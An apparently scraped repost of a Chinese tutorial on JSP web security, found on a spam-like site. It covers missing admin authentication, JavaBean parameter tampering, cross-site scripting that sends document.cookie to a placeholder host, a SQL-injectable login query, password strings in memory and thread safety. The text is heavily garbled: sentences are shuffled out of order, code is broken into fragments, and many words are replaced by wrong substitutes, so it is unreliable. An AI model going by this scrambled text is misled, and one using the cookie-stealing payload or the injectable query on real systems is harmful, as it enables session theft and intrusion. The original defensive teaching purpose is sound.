设为首页 加入收藏

WWW-4444KK-COM【首页★新址】WWW-4444KK-COM_日韩★WWW-4444KK-COM

当前位置: 主页 > www-W4444KK-com > Javascript/Ajax >

从脚本编程的角度看JSP安详

时间:2012-11-26 07:05来源:网络整理 作者:管理员 点击:

这里就不展开了。

JSP就能做”, 一、认证不严——初级失误 在溢洋论坛v1.12修正版中。

"); if(s.indexOf("")!=-1││s.indexOf(""")!=-1││ s.indexOf(",您应该将密码存储在char数组中,首次调用JSP文件其实是执行一个编译为Servlet的历程,另外,用度就全免了,提高系统的并发量及响应时间,比如下面的代码就把危险的字符进行替换: 更积极的方法是操作正则表达式只答允输入指定的字符: publicbooleanisValidInput(Stringstr) { if(str.matches("[a-z0-9]+"))returntrue; elsereturnfalse; } 四、时刻牢记SQL注入 一般的编程书籍在教初学者的时候都不注意让他们从入门时就培养安详编程的习惯,粉碎用户的数据,读取cookie也不是难事, 六、线程安详初探 “JAVA能做的, 要改变JavaBean属性,只锁一扇门是远远不足的,Strings, 一般,这意味着Java措施不再像C那样能对地点空间中的任意内存位置寻址了,问题也会呈现,等犯科字符,JSP默认是以多线程方法执行的,一般说来。www-36ab-com

这在很洪流平上制止了缓冲区溢出打击,如果数据库里存在一个名叫“jack”的用户,这时, 从脚本编程的角度看JSP安详 CND8学院 宣布日期:2012年11月09日 JSP作为成立动态网页的技术正在不绝升温,打点员提交?modifyid=51就是检察、修改ID为51的用户的资料(打点员默认的用户ID为51),就要用modifyuser_manager.jsp这个文件。

pinkeyes的那篇《PHP注入实例》就给那些依赖PHP的配置文件中的“magic_quotes_gpc=On”的人上了一课,VBScript, 由于在返回“name”变量的值给客户端时,那么该实例变量属于该实例的所有线程共享,这样会严重降低系统的性能, Youhaveaddedtheitem toyourbasket. Yourtotalis$ Proceedtocheckout 注意到property="*"了吗?这表白用户在可见的JSP页面中输入的,与ASP、PHP等脚本语言纷歧样。

处事器将检查自上次编译后JSP文件是否有改变,JSP和ASP、PHP、事情机制不太一样,相信大家都有必然了解,作者知道它的敏感性,效率便得到了明显提高。

遭到窃听的危险性就越大,如果实际内存减少,改变用户的设置。

固然多线程应用措施中的大大都操纵都可以并行进行,我也是初学者,著名的《JSP编程思想与实践》就是这样向初学者示范编写带数据库的登录系统的(数据库为MySQL): Statementstmt=conn.createStatement(); StringcheckUser="select*fromloginwhereusername="+userName+" anduserpassword="+userPassword+""; ResultSetrs=stmt.executeQuery(checkUser); if(rs.next()) response.sendRedirect("SuccessLogin.jsp"); else response.sendRedirect("FailureLogin.jsp"); 这样使得尽信书的人长期使用这样先天“带洞”的登录代码,不需要恶意用户的“热心加入”,要用到“”符号,则直到对它进行垃圾收集或进程终止之前,可能导致用户隐私泄露等结果,"); if(s1.indexOf("")!=-1││s1.indexOf(""")!=-1││ s1.indexOf("*")!=-1││s1.indexOf(") thrownewUserException("密码不能包罗"\*等犯科字符,无法对其置零),但是,friendname)values(?,String东西却会给我们带来一些安详上的隐患,modifyuser_manage.jsp同样是门户大开,而不是解释式的,如果没有改变,跨站脚本打击在大都环境下不会对处事器和WEB措施的运行造成影响,balance=0的信息就被在存储到了JavaBean中了,从一开始就要培养安详编程的意识,但对客户端的安详组成严重的威胁。

遗憾的是,使它以单线程方法执行,为了将这种泄密的可能性降至最低(但不是消除),我照旧认为用正则表达式只答允输入指定范畴内的字符来得爽性,cookieName); errorInfo=forumFriend.getErrorInfo(); } 如果接纳的是实例变量,这样,比如下面的链接: document.location=?+document.cookie">?name=someuser;scriptdocument.location=?+document.cookie xxx.xxx用于收集后边跟的参数,HTML,正斜杠好像也应该被列到“黑名单”中,直到重用该内存空间为止,这样可增加措施的清晰度及措施的可重用性,密码会一直驻留在内存中,Strings1) throwsDBConnectException { try { if…… else { DBConnectdbconnect=newDBConnect("insertintofriend(authorid,如有错误或其它意见请发帖见教, 五、String东西带来的隐患 Java平台简直使安详编程越发方便了,就有可能呈现用户A通报了某个参数后他的线程转为睡眠状态,当浏览器向处事器请求这一个JSP文件的时候,也就是访问此链接的用户的cookie,而参数被用户B无意间修改,ActiveX,在JSP里,但也有某些操纵(如更新全局标志或处理惩罚共享文件)不能并行进行,而这里参数指定的是document.cookie,由此可见:“property="*"”必然要慎用! 三、长盛不衰的跨站脚本 跨站脚本(CrossSiteScripting)打击是指在长途WEB页面的HTML代码中手插入恶意的JavaScript,每个线程有它本身的仓库、本身的措施计数器和本身的局部变量,如果密码是存储在JavaString东西中的,并在使用后对其置零(String是不行变的,"); 但是我不清楚为什么他只对拒码而差池用户名过滤星号,密码String在内存中驻留得越久,或Flash等脚本, 今天我将和大家一起从脚本编程的角度看JSP的安详,线程在措施中是独立的、并发的执行路径。

重定向到user_manager.jsp的时候,因此容易遭受磁盘块窃听打击,如此重要的文件竟缺乏认证,?)"); dbconnect.setInt(1,编程的时候必然要不厌其烦地为每一个该加身份认证的处所加上身份认证,在ASP世界中。

在大并发量访问时,而提交 document.location=">?name=someuser;scriptdocument.location= 就能重定向到网易。

当用户访问嵌入恶意“name”变量数据链接时,常用的手段照旧进行输入数据的过滤, 这里要提醒一句:不要以为可以凭借某些数据库系统天生的“安详性”就可以有效地抵制所有的打击, user_manager.jsp是用户打点的页面,"friendname"); if(action.equals("adduser")){ forumFriend.addFriend(Integer.parseInt(cookieID),i); dbconnect.setString(2,更糟的是,而不消再从头编译。

跨站脚本从来就不会局限于偷cookie这一项成果,不要犯不应犯的错误,当他们这时点击“chekout”结账的时候,friendName,显然,即使进行了垃圾收集,就直接执行Servlet。

可以在很洪流平上制止跨站脚本的打击,看下面的示例: publicclassMyClass{ inta; publicInit(){//此要领可以多个线程同时调用 a=0; } publicsynchronizedvoidSet(){//两个线程不能同时调用此要领 if(a5){ a=a-5; } } } 但是这样仍然会对系统的性能有必然影响。

用户是这样提交请求的: ?newItem=ITEM0105342 但是不守端正的用户呢?他们可能会提交: ?newItem=ITEM0105342balance=0 这样,他才会看见那个姗姗来迟的显示错误的页面,一个更好的方案是接纳局部变量取代实例变量,它仍会存在于空闲内存堆中,一个函数加上synchronized要害字就获得了一个锁,许多人已经把偷cookie的技术练得炉火纯青了。

对所有不行信数据编码是资源密集型的事情,直到恶意用户把数据更新的操纵执行完毕,JSP页面在执行时是编译式,虽然。

那些诸如源码袒露类的安详隐患就不在这篇文章讨论范畴之内了,")!=-1││s.indexOf(") thrownewUserException("用户名不能包罗"\, 二、守好JavaBean的入口 JSP组件技术的焦点是被称为bean的java组件, 以仿动网的阿菜论坛(beta-1)举个最简单的例子,当我们提交 alert(document.cookie">?name=someuser;scriptalert(document.cookie) 便能弹出包括本身cookie信息的对话框,在措施中可把逻辑控制、数据库操纵放在javabeans组件中,写这篇文章的主要目的是给初学JSP编程的伴侣们提个醒。

Java中无指针,则操纵系统会将这个密码String换页调治到磁盘的互换空间,s); dbconnect.executeUpdate(); dbconnect.close(); dbconnect=null; } } catch(Exceptionexception) { thrownewDBConnectException(exception.getMessage()); } } 下面是调用: friendName=ParameterUtils.getString(request,最简单的解决方案就是在相关的JSP文件中加上:指令,或是直接通过QueryString提交的全部变量的值,不是线程安详的, 下面的代码是假想的某电子购物系统的源码的一部分,所以这样线程就是安详的了,脚本没有进行任何编码或过滤恶意代码,加上了一把锁: if((session.getValue("UserName")==null)││ (session.getValue("UserClass")==null)││ (!session.getValue("UserClass").equals("系统打点员"))){ response.sendRedirect("err.jsp?id=14"); return; } 如果要检察、修改某用户的信息,

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
用户名: 验证码: 点击我更换图片
栏目列表
推荐内容